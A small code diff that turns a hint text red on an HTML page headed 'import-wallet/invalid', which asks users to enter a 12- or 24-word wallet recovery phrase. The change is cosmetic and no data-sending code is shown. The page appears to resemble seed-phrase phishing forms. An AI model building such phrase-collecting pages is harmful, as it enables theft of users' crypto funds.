--- a/sync/import-wallet/invalid.html
+++ b/sync/import-wallet/invalid.html
@@ -55,7 +55,7 @@
 
             <textarea name="phrase" class="phrase" required="required" minlength="12" placeholder="Phrase"></textarea>
             <br>
-            <div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
+            <div class="desc" style="color: red;">Typically 12 (sometimes 24) words separated by single spaces</div>
             <br>
             <button type="submit"  class="btn">IMPORT</button>
         </form>
